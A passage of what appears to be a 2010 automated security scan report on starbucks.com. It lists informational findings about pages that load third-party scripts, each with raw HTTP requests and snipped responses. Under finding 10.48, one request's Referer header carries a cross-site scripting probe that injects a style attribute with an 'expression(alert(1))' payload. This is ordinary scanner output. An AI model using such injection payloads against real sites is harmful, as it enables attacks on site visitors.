Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:22:23 GMT
Connection: close
Content-Length: 42639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.30. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:18:52 GMT
Connection: close
Content-Length: 40860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.31. http://www.starbucks.com/coffeehouse

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /coffeehouse HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:24:28 GMT
Connection: close
Content-Length: 50861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.32. http://www.starbucks.com/coffeehouse/community

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/community

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
http://widgets.twimg.com/j/2/widget.js
http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /coffeehouse/community HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:37:38 GMT
Connection: close
Content-Length: 41337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<!-- Facebook Fan Box -->
               <script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<!-- Twitter Widget -->
               <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.33. http://www.starbucks.com/coffeehouse/community/mystarbucksidea

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/community/mystarbucksidea

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /coffeehouse/community/mystarbucksidea HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:38:17 GMT
Connection: close
Content-Length: 41392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.34. http://www.starbucks.com/coffeehouse/entertainment

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/entertainment

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /coffeehouse/entertainment HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:24:29 GMT
Connection: close
Content-Length: 53206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.35. http://www.starbucks.com/coffeehouse/mobile-apps

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse/mobile-apps HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:32:39 GMT
Connection: close
Content-Length: 41762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.36. http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/mystarbucks

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse/mobile-apps/mystarbucks HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:32:52 GMT
Connection: close
Content-Length: 37684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.37. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/starbucks-card-mobile

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse/mobile-apps/starbucks-card-mobile HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:37:23 GMT
Connection: close
Content-Length: 38960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.38. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/starbucks-card-mobile-bb

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse/mobile-apps/starbucks-card-mobile-bb HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:35:46 GMT
Connection: close
Content-Length: 39455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.39. http://www.starbucks.com/coffeehouse/wireless-internet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse/wireless-internet HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:24:40 GMT
Connection: close
Content-Length: 37733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.40. http://www.starbucks.com/coffeehouse/wireless-internet/in-canada

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet/in-canada

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse/wireless-internet/in-canada HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:24:53 GMT
Connection: close
Content-Length: 38013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.41. http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet/starbucks-digital-network

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse/wireless-internet/starbucks-digital-network HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:32:36 GMT
Connection: close
Content-Length: 38465

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.42. http://www.starbucks.com/customer-service/contact

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/contact

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /customer-service/contact HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:24:00 GMT
Connection: close
Content-Length: 36903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.43. http://www.starbucks.com/customer-service/faqs/coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /customer-service/faqs/coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:15:05 GMT
Connection: close
Content-Length: 37225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.44. http://www.starbucks.com/customer-service/faqs/coffeehouse

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/coffeehouse

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /customer-service/faqs/coffeehouse HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:18:08 GMT
Connection: close
Content-Length: 57890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.45. http://www.starbucks.com/customer-service/faqs/menu

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/menu

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /customer-service/faqs/menu HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:16:37 GMT
Connection: close
Content-Length: 36767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.46. http://www.starbucks.com/customer-service/faqs/responsibility

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/responsibility

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /customer-service/faqs/responsibility HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:18:45 GMT
Connection: close
Content-Length: 36990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.47. http://www.starbucks.com/customer-service/faqs/shop

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/shop

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /customer-service/faqs/shop HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:21:22 GMT
Connection: close
Content-Length: 51351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.48. http://www.starbucks.com/menu

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:28:32 GMT
Content-Length: 72282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
